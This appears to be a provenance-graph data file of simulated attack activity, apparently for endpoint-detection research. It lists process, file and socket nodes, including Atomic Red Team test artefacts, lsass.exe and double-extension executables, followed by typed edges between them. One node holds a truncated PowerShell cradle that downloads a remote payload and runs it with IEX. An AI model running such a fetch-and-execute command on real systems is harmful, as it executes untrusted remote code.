20
MP*-863e7c22c771e4005197ae28363584f8.exe 2620
MP-OneDrive.exe 
MP-ServiceModelReg.exe
SO-https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml
MP-firefox.exe 
MF-C:\Windows\System32\runas.exe
MF-\Users\admin\AppData\Local\Temp\Protected.exe
SF-C:\Users\admin\AppData\Roaming\XClient.exe
MP*-WScript.exe
SF-C:\Users\admin\Desktop\7d93b142ab6fca16c0be4c3720a50833.exe
MP*-where.exe
MP-lsass.exe
SO-https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_
MF-PathToAtomicsFolder\T1218.011\src\index.hta
MF-C:\Users\admin\Desktop\Запрос
TP*-danke.exe 
MP-C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe
SF-C:\Users\Public\Music\mediatv
SO-192.168.5.25
TP-FACTURA COMERCIAL_70051.pdf.exe
46
0 1 FR-1
0 2 FR-1
1 2 UK-1
3 0 RF-1
0 4 FR-1
3 4 RF-1
0 5 WR-1
4 5 UK-1
0 6 RD-1
0 7 WR-1
0 8 FR-1
8 3 ST-2
8 6 WR-2
8 7 RD-2
0 9 RD-1
8 9 WR-2
0 10 FR-1
10 3 ST-3
10 6 WR-3
10 7 WR-3
8 10 UK-2
3 11 RF-2
11 6 WR-3
11 7 RD-3
11 9 WR-3
12 11 RF-3
11 13 RD-3
11 14 RD-3
15 6 WR-4
15 7 WR-4
15 9 RD-4
11 15 IJ-3
15 12 ST-4
15 13 RD-4
15 14 RD-4
16 6 CD-4
16 7 WR-4
16 9 WR-4
11 16 UK-3
15 17 RD-4
18 15 RF-4
19 9 RD-4
12 19 RF-4
19 13 WR-4
19 14 WR-4
15 19 UK-4

